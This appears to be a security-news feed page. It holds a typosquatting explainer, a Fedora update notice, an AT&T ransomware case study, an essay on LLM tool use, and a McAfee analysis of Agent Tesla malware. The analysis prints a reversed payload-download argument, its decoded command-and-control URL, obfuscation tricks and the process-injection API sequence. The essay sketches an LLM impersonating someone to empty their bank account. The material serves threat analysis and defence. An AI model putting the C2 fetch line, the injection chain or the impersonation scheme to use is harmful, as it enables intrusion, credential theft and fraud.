golang-1.19.13-1.fc37

Read Time:10 Second

FEDORA-2023-a9da32bf13

Packages in this update:

golang-1.19.13-1.fc37

Update description:

This release includes fixes to the go command, the crypto/tls, net/http packages, and several more.

Read More

How Typosquatting Scams Work

Read Time:3 Minute, 57 Second

Your teacher was right. Spelling counts, particularly to scammers.

Enter the world of typosquatting scams. Also known as URL hijacking, typosquatting scams target internet users who incorrectly type a website address into their web browser.

Scammers have long used typosquatting techniques to capture traffic from those butterfingers moments we all have when typing on our keyboards. And the butterthumbs moments on our phones.

For example, say you type “websiteaddresss dot-com” instead of “websiteaddress dot-com.” More than just a mistake, a mistyped address might land you on a malicious site designed to steal personal information, make money, or spread malware.

The scam sites you might land on vary. Some serve up a screenload of spammy ads. Others host malicious download links, and yet more lead to stores full of cheap, knockoff goods. In other cases, scammers take it up a notch. We’ve seen typosquatting sites evolve into clever copycats of legitimate sites. Some look like real banking and e-commerce sites that they steal traffic from, complete with stolen logos and familiar login screens. With this, scammers hope to trick you into entering your passwords and other sensitive information.

Companies are well aware of this practice. Many purchase URLs with those common misspellings and redirect them to their proper sites. Further, many brands put up anti-fraud pages on their sites that list the legitimate addresses they use to contact customers. Here at McAfee, we have an anti-fraud center of our own.

The fact remains, people make mistakes. And that can lead to risky scam sites. However, you can still avoid typosquatting attacks quite easily.

The big business of typosquatting

For starters, it helps to know that typosquatting is often big business. In many cases, larger cybercrime organizations set up entire flights of malicious sites that can number into the dozens to the hundreds.

Let’s check out a few examples and see just how sophisticated typosquatting scams can be:

“dot.cm” scams

In 2018, researchers found a host of addresses that were registered in the names of well-known sites, but ending in  “.cm”, instead of “.com”. These copycat addresses included financial websites, such as “Chase dot-cm” and “Citicards dot-cm,” as well as social and streaming sites.

Scammers used the .cm sites to advertise promotions and surveys used to collect users’ personal information. What’s more, more than 1,500 of them were registered to the same email address, indicating that someone was trying to turn typosquatting into a serious business.

“dot.om” scams

Similarly, 2016 saw the advent of malicious dot-om sites, that mimicked big names like “linkedin dot-om” and “walgreens dot-om.” Even the interesting typo found in “youtubec dot-om” cropped up. Of note, single entities registered these sites in batches. Researchers found that individuals or companies registered anywhere from 18 to 96 of them. Again, signs of serious business.

Big brand and voice assistant typosquatting scams

Recently, security researchers further found an increase in the number of typosquatting sites. An increase of 10% from 2021 to 2022. These sites mimic popular app stores, Microsoft addresses, services like TikTok, Snapchat, PayPal, and on and on.

Further, scammers have gotten wise to the increased use of personal assistants to look up web addresses on phones and in homes. Typosquatting now includes soundalike names in addition to lookalike names. With that, they can capitalize when an assistant doesn’t quite hear a command properly.

How to protect yourself from typosquatting

No doubt, slip-ups happen when browsing. Yet you can minimize how often with a few steps—and give yourself an extra line of defense if a mistake still slips through.

Whether you type in a web address to the address field, or a search engine, be careful that you spell the address correctly before you hit “return”.
If you are going to a website where you might share private information, look for the green lock symbol in the upper left-hand corner of the address bar. This indicates that the site uses encryption to secure the data that you share.
Be suspicious of websites with low-quality graphics or misspellings. These are telltale signs of fake websites.
Consider bookmarking sites you visit regularly to make sure you get to the right site, each time.
Don’t click on links in emails, text messages, and popup messages unless you know and trust the sender.
Consider using a safe browsing tool such as McAfee Web Protection, which can help you avoid dangerous links, bad downloads, malicious websites, and more.​
Always use comprehensive online protection software like ours on your computers and devices to protect you from malware and other online threats.

The post How Typosquatting Scams Work appeared first on McAfee Blog.

Read More

Agent Tesla’s Unique Approach: VBS and Steganography for Delivery and Intrusion

Read Time:10 Minute, 45 Second

Authored by Yashvi Shah

Agent Tesla functions as a Remote Access Trojan (RAT) and an information stealer built on the .NET framework. It is capable of recording keystrokes, extracting clipboard content, and searching the disk for valuable data. The acquired information can be transmitted to its command-and-control server via various channels, including HTTP(S), SMTP, FTP, or even through a Telegram channel.

Generally, Agent Tesla uses deceptive emails to infect victims, disguising as business inquiries or shipment updates. Opening attachments triggers malware installation, concealed through obfuscation. The malware then communicates with a command server to extract compromised data.

The following heat map shows the current prevalence of Agent Tesla on field:

Figure 1: Agent Tesla heat map

McAfee Labs has detected a variation where Agent Tesla was delivered through VBScript (VBS) files, showcasing a departure from its usual methods of distribution. VBS files are script files used in Windows for automating tasks, configuring systems, and performing various actions. They can also be misused by cybercriminals to deliver malicious code and execute harmful actions on computers.

Technical Analysis

The examined VBS file executed numerous PowerShell commands and then leveraged steganography to perform process injection into RegAsm.exe as shown in Figure 2. Regasm.exe is a Windows command-line utility used to register .NET assemblies as COM components, allowing interoperability between different software. It can also be exploited by malicious actors for purposes like process injection, potentially enabling covert or unauthorized operations.

Figure 2: Infection Chain

VBS needs scripting hosts like wscript.exe to interpret and execute its code, manage interactions with the user, handle output and errors, and provide a runtime environment. When the VBS is executed, wscript invokes the initial PowerShell command.

Figure 3: Process Tree

First PowerShell command

The first PowerShell command is encoded as illustrated here:

Figure 4: Encoded First PowerShell

Obfuscating PowerShell commands serves as a defense mechanism employed by malware authors to make their malicious intentions harder to detect. This technique involves intentionally obfuscating the code by using various tricks, such as encoding, replacing characters, or using convoluted syntax. This runtime decoding is done to hide the true nature of the command from static analysis tools that examine the code without execution. Upon decoding, achieved by substituting occurrences of ‘#@$#’ with ‘A’ and subsequently applying base64-decoding, we successfully retrieved the decrypted PowerShell content as follows:

Figure 5: Decoded content

Second PowerShell Command

The deciphered content serves as the parameter passed to the second instance of PowerShell..

Figure 6: Second PowerShell command

Deconstructing this command line for clearer comprehension:

Figure 7: Disassembled command

Steganography

As observed, the PowerShell command instructs the download of an image, from the URL that is stored in variable “imageURL.” The downloaded image is 3.50 MB in size and is displayed below:

Figure 8: Downloaded image

This image serves as the canvas for steganography, where attackers have concealed their data. This hidden data is extracted and utilized as the PowerShell commands are executed sequentially. The commands explicitly indicate the presence of two markers, ‘<<BASE64_START>>’ and ‘<<BASE64_END>>’. The length of the data is stored in variable ‘base64Length’. The data enclosed between these markers is stored in ‘base64Command’. The subsequent images illustrate these markers and the content encapsulated between them.

Figure 9: Steganography

After obtaining this data, the malware proceeds with decoding procedures. Upon examination, it becomes apparent that the decrypted data is a .NET DLL file. In the subsequent step, a command is executed to load this DLL file into an assembly.

Figure 10: DLL obtained from steganography

Process Injection into RegAsm.exe

This DLL serves two purposes:

Downloading and decoding the final payload
Injecting it into RegAsm.exe

Figure 11: DLL loaded

In Figure 11, at marker 1, a parameter named ‘QBXtX’ is utilized to accept an argument for the given instruction. As we proceed with the final stage of the PowerShell command shown in Figure 7, the sequence unfolds as follows:

$arguments = ,(‘txt.46ezabwenrtsac/42.021.871.591//:ptth’)

The instruction mandates reversing the content of this parameter and subsequently storing the outcome in the variable named ‘address.’ Upon reversing the argument, it transforms into:

http://195.178.120.24 /castrnewbaze64.txt

Figure 12: Request for payload

Therefore, it is evident that this DLL is designed to fetch the mentioned text file from the C2 server via the provided URL and save its contents within the variable named “text.” This file is 316 KB in size. The data within the file remains in an unreadable or unintelligible format.

Figure 13: Downloaded text file

In Figure 11, at marker 2, the contents of the “text” variable are reversed and overwritten in the same variable. Subsequently, at marker 3, the data stored in the “text” variable and is subjected to base64 decoding. Following this, we determined that the file is a .NET compiled executable.

Figure 14: Final payload

In Figure 11, another activity is evident at marker 3, where the process path for the upcoming process injection is specified. The designated process path for the process injection is:

“C:WindowsMicrosoft.NETFrameworkv4.0.30319RegAsm.exe”.

Since RegAsm.exe is a legitimate Windows tool, it’s less likely to raise suspicion from security solutions. Injecting .NET samples into it allows attackers to effectively execute their malicious payload within a trusted context, making detection and analysis more challenging.

Process injection involves using Windows API calls to insert code or a payload into the memory space of a running process. This allows the injected code to execute within the context of the target process. Common steps include allocating memory, writing code, creating a remote thread, and executing the injected code. In this context, the DLL performs a sequence of API calls to achieve process injection:

Figure 15: Process Injection

By obscuring the sequence of API calls and their intended actions through obfuscation techniques, attackers aim to evade detection and make it harder for security researchers to unravel the true behavior of the malicious code. The function ‘hU0H4qUiSpCA13feW0’ is used for replacing content. For example,

“kern!”.Replace(“!”, “el32”)  à  kernel32

Class1.hU0H4qUiSpCA13feW0(“qllocEx”, “q”, “VirtualA”) à VirtualAllocEx

As a result, these functions translate into the subsequent API calls:

CreateProcessA : This API call is typically employed to initiate the creation of a new process, rather than for process injection. In the context of process injection, the focus is generally on targeting an existing process and injecting code into it.
VirtualAllocEx: This is often used in process injection to allocate memory within the target process to host the injected code.
ReadProcessMemory: This is used to read the memory of a target process. It is typically used in reflective DLL injection to read the contents of a DLL from the injector’s memory and write it into the target process.
GetThreadContext: This API is used to retrieve the context (registers, flags, etc.) of a thread within a target process. It’s useful for modifying thread execution flow during injection.
Wow64GetThreadContext: This is like GetThreadContext, but it’s used when dealing with 32-bit processes on a 64-bit system.
SetThreadContext: This API is used to set the context of a thread within a target process. This can be useful for modifying the execution flow.
Wow64SetThreadContext: Like SetThreadContext, but for 32-bit processes on a 64-bit system.
ZwUnmapViewOfSection: This is used to unmap a section of a process’s virtual address space, which could potentially be used to remove a DLL loaded into a target process during injection.
WriteProcessMemory: This is used to write data into the memory of a target process. It’s commonly used for injecting code or data into a remote process.
ResumeThread: This is used to resume the execution of a suspended thread, often after modifying its context or injecting code.

Upon successful injection of the malware into RegAsm.exe, it initiates its intended operations, primarily focused on data theft from the targeted system.

The ultimate executable is heavily obfuscated. It employs an extensive array of switch cases and superfluous code, strategically intended to mislead researchers and complicate analysis. Many of the functions utilize either switch cases or their equivalent constructs, to defend detection. The following snippet of code depicts this:

Figure 16: Obfuscation

Collection of data:

Fingerprinting:

Agent Tesla collects data from compromised devices to achieve two key objectives: firstly, to mark new infections, and secondly, to establish a unique ‘fingerprint’ of the victim’s system. The collected data encompasses:

Computer Name
IP information
Win32_baseboard
Serial number
win32_processor
processorID
Win32_NetworkAdapterConfiguration
MacAddress

Web Browsers:

Agent Tesla initiates the process of gathering data from various web browsers. It utilizes switch cases to handle different browsers, determined by the parameters passed to it. All of these functions are heavily obscured through obfuscation techniques. The following figures depict the browser data that it attempted to retrieve.

Figure 17: Opera browser

Figure 18: Yandex browser

Figure 19: Iridium browser

Figure 20: Chromium browser

Similarly, it retrieves data from nearly all possible browsers. The captured log below lists all the browsers from which it attempted to retrieve data:

Figure 21: User data retrieval from all browsers -1

Figure 22: User data retrieval from all browsers – 2

Mail Clients:

Agent Tesla is capable of stealing various sensitive data from email clients. This includes email credentials, message content, contact lists, mail server settings, attachments, cookies, auto-complete data, and message drafts. It can target a range of email services to access and exfiltrate this information. Agent Tesla targets the following email clients to gather data:

Figure 23: Mail clients

Exfiltration:

Agent Tesla employs significant obfuscation techniques to evade initial static analysis attempts. This strategy conceals its malicious code and actual objectives. Upon successful decoding, we were able to scrutinize its internal operations and functionalities, including the use of SMTP for data exfiltration.

The observed sample utilizes SMTP as its chosen method of exfiltration. This protocol is frequently favored due to its minimal overhead demands on the attacker. SMTP reduces overhead for attackers because it is efficient, widely allowed in networks, uses existing infrastructure, causes minimal anomalies, leverages compromised accounts, and appears less suspicious compared to other protocols. A single compromised email account can be used for exfiltration, streamlining the process, and minimizing the need for complex setups. They can achieve their malicious goals with just a single email account, simplifying their operations.

Figure 24: Function calls made for exfiltration.

This is the procedure by which functions are invoked to facilitate data extraction via SMTP:

A specific value is provided as a parameter, and this value is processed within the functions. As a result, it ultimately determines the port number to be utilized for SMTP communication. In this case, port number 587 is used for communication.

Figure 25: Port number

Next, the malware retrieves the hostname of the email address it intends to utilize i.e., corpsa.net.

Figure 26: Domain retrieval

Subsequently, the email address through which communication is intended to occur is revealed.

Figure 27: Email address used

Lastly, the password for that email address is provided, so that attacker can log in and can start sending out the data.

Figure 28: Password

The SMTP process as outlined involves a series of systematic steps. It begins with the processing of a specific parameter value, which subsequently determines the port number for SMTP communication. Following this, the malware retrieves the associated domain of the intended email address, revealing the address itself and ultimately providing the corresponding password. This orchestrated sequence highlights how the malware establishes a connection through SMTP, facilitating its intended operations.

Following these steps, the malware efficiently establishes a login using acquired credentials. Once authenticated, it commences the process of transmitting the harvested data to a designated email address associated with the malware itself.

Summary:

The infection process of Agent Tesla involves multiple stages. It begins with the initial vector, often using email attachments or other social engineering tactics. Once executed, the malware employs obfuscation to avoid detection during static analysis. The malware then undergoes decoding, revealing its true functionality. It orchestrates a sequence of PowerShell commands to download and process a hidden image containing encoded instructions. These instructions lead to the extraction of a .NET DLL file, which subsequently injects the final payload into the legitimate process ‘RegAsm.exe’ using a series of API calls for process injection. This payload carries out its purpose of data theft, including targeting browsers and email clients for sensitive information. The stolen data is exfiltrated via SMTP communication, providing stealth and leveraging email accounts. Overall, Agent Tesla’s infection process employs a complex chain of techniques to achieve its data-stealing objectives.

Indicators of compromise (IoC):

File
MD5
SHA256

VBS file
e2a4a40fe8c8823ed5a73cdc9a8fa9b9
e7a157ba1819d7af9a5f66aa9e161cce68d20792d117a90332ff797cbbd8aaa5

JPEG file
ec8dfde2126a937a65454323418e28da
21c5d3ef06d8cff43816a10a37ba1804a764b7b31fe1eb3b82c144515297875f

DLL file
b257f83495996b9a79d174d60dc02caa
b2d667caa6f3deec506e27a5f40971cb344b6edcfe6182002f1e91ce9167327f

Final payload
dd94daef4081f63cf4751c3689045213
abe5c5bb02865ac405e08438642fcd0d38abd949a18341fc79d2e8715f0f6e42

Table 1:Indicators of Compromise

The post Agent Tesla’s Unique Approach: VBS and Steganography for Delivery and Intrusion appeared first on McAfee Blog.

Read More

LLMs and Tool Use

Read Time:6 Minute, 41 Second

Last March, just two weeks after GPT-4 was released, researchers at Microsoft quietly announced a plan to compile millions of APIs—tools that can do everything from ordering a pizza to solving physics equations to controlling the TV in your living room—into a compendium that would be made accessible to large language models (LLMs). This was just one milestone in the race across industry and academia to find the best ways to teach LLMs how to manipulate tools, which would supercharge the potential of AI more than any of the impressive advancements we’ve seen to date.

The Microsoft project aims to teach AI how to use any and all digital tools in one fell swoop, a clever and efficient approach. Today, LLMs can do a pretty good job of recommending pizza toppings to you if you describe your dietary preferences and can draft dialog that you could use when you call the restaurant. But most AI tools can’t place the order, not even online. In contrast, Google’s seven-year-old Assistant tool can synthesize a voice on the telephone and fill out an online order form, but it can’t pick a restaurant or guess your order. By combining these capabilities, though, a tool-using AI could do it all. An LLM with access to your past conversations and tools like calorie calculators, a restaurant menu database, and your digital payment wallet could feasibly judge that you are trying to lose weight and want a low-calorie option, find the nearest restaurant with toppings you like, and place the delivery order. If it has access to your payment history, it could even guess at how generously you usually tip. If it has access to the sensors on your smartwatch or fitness tracker, it might be able to sense when your blood sugar is low and order the pie before you even realize you’re hungry.

Perhaps the most compelling potential applications of tool use are those that give AIs the ability to improve themselves. Suppose, for example, you asked a chatbot for help interpreting some facet of ancient Roman law that no one had thought to include examples of in the model’s original training. An LLM empowered to search academic databases and trigger its own training process could fine-tune its understanding of Roman law before answering. Access to specialized tools could even help a model like this better explain itself. While LLMs like GPT-4 already do a fairly good job of explaining their reasoning when asked, these explanations emerge from a “black box” and are vulnerable to errors and hallucinations. But a tool-using LLM could dissect its own internals, offering empirical assessments of its own reasoning and deterministic explanations of why it produced the answer it did.

If given access to tools for soliciting human feedback, a tool-using LLM could even generate specialized knowledge that isn’t yet captured on the web. It could post a question to Reddit or Quora or delegate a task to a human on Amazon’s Mechanical Turk. It could even seek out data about human preferences by doing survey research, either to provide an answer directly to you or to fine-tune its own training to be able to better answer questions in the future. Over time, tool-using AIs might start to look a lot like tool-using humans. An LLM can generate code much faster than any human programmer, so it can manipulate the systems and services of your computer with ease. It could also use your computer’s keyboard and cursor the way a person would, allowing it to use any program you do. And it could improve its own capabilities, using tools to ask questions, conduct research, and write code to incorporate into itself.

It’s easy to see how this kind of tool use comes with tremendous risks. Imagine an LLM being able to find someone’s phone number, call them and surreptitiously record their voice, guess what bank they use based on the largest providers in their area, impersonate them on a phone call with customer service to reset their password, and liquidate their account to make a donation to a political party. Each of these tasks invokes a simple tool—an Internet search, a voice synthesizer, a bank app—and the LLM scripts the sequence of actions using the tools.

We don’t yet know how successful any of these attempts will be. As remarkably fluent as LLMs are, they weren’t built specifically for the purpose of operating tools, and it remains to be seen how their early successes in tool use will translate to future use cases like the ones described here. As such, giving the current generative AI sudden access to millions of APIs—as Microsoft plans to—could be a little like letting a toddler loose in a weapons depot.

Companies like Microsoft should be particularly careful about granting AIs access to certain combinations of tools. Access to tools to look up information, make specialized calculations, and examine real-world sensors all carry a modicum of risk. The ability to transmit messages beyond the immediate user of the tool or to use APIs that manipulate physical objects like locks or machines carries much larger risks. Combining these categories of tools amplifies the risks of each.

The operators of the most advanced LLMs, such as OpenAI, should continue to proceed cautiously as they begin enabling tool use and should restrict uses of their products in sensitive domains such as politics, health care, banking, and defense. But it seems clear that these industry leaders have already largely lost their moat around LLM technology—open source is catching up. Recognizing this trend, Meta has taken an “If you can’t beat ’em, join ’em” approach and partially embraced the role of providing open source LLM platforms.

On the policy front, national—and regional—AI prescriptions seem futile. Europe is the only significant jurisdiction that has made meaningful progress on regulating the responsible use of AI, but it’s not entirely clear how regulators will enforce it. And the US is playing catch-up and seems destined to be much more permissive in allowing even risks deemed “unacceptable” by the EU. Meanwhile, no government has invested in a “public option” AI model that would offer an alternative to Big Tech that is more responsive and accountable to its citizens.

Regulators should consider what AIs are allowed to do autonomously, like whether they can be assigned property ownership or register a business. Perhaps more sensitive transactions should require a verified human in the loop, even at the cost of some added friction. Our legal system may be imperfect, but we largely know how to hold humans accountable for misdeeds; the trick is not to let them shunt their responsibilities to artificial third parties. We should continue pursuing AI-specific regulatory solutions while also recognizing that they are not sufficient on their own.

We must also prepare for the benign ways that tool-using AI might impact society. In the best-case scenario, such an LLM may rapidly accelerate a field like drug discovery, and the patent office and FDA should prepare for a dramatic increase in the number of legitimate drug candidates. We should reshape how we interact with our governments to take advantage of AI tools that give us all dramatically more potential to have our voices heard. And we should make sure that the economic benefits of superintelligent, labor-saving AI are equitably distributed.

We can debate whether LLMs are truly intelligent or conscious, or have agency, but AIs will become increasingly capable tool users either way. Some things are greater than the sum of their parts. An AI with the ability to manipulate and interact with even simple tools will become vastly more powerful than the tools themselves. Let’s be sure we’re ready for them.

This essay was written with Nathan Sanders, and previously appeared on Wired.com.

Read More

AT&T Cybersecurity serves as critical first responder during attack on municipality

Read Time:1 Minute, 24 Second

Earlier this year, analysts in the AT&T Cybersecurity Managed Threat Detection and Response (MTDR) security operations center (SOC) were alerted to a potential ransomware attack on a large municipal customer. The attack, which was subsequently found to have been carried out by members of the Royal ransomware group, affected several departments and temporarily disrupted critical communications and IT systems.

During the incident, AT&T analysts served as critical first responders, promptly investigating alarms in the USM Anywhere platform and quickly communicating the issue to the customer. They also provided extensive after-hours support at the height of the attack—as the customer shared updates on impacted servers and services, the analysts gave guidance on containment and remediation. They shared all observed indicators of compromise (IOCs) with the customer, some of which included IP addresses and domains that could be blocked quickly by the AT&T Managed Firewall team because the customer was also using AT&T’s managed firewall services.

Just 24 hours after initial communications, analysts had compiled and delivered to the customer a detailed report on the incident findings. The report included recommendations on how to help protect against future ransomware attacks as well as suggested remediation actions the customer should take in the event that legal, compliance, or deeper post-incident forensic review is needed.

Read our case study to learn more about how our analysts helped the customer accelerate their time to respond and contain the damage from the attack, and learn how the AT&T Alien Labs threat intelligence team has used the findings from this incident to help secure all AT&T Cybersecurity managed detection and response customers!

Read More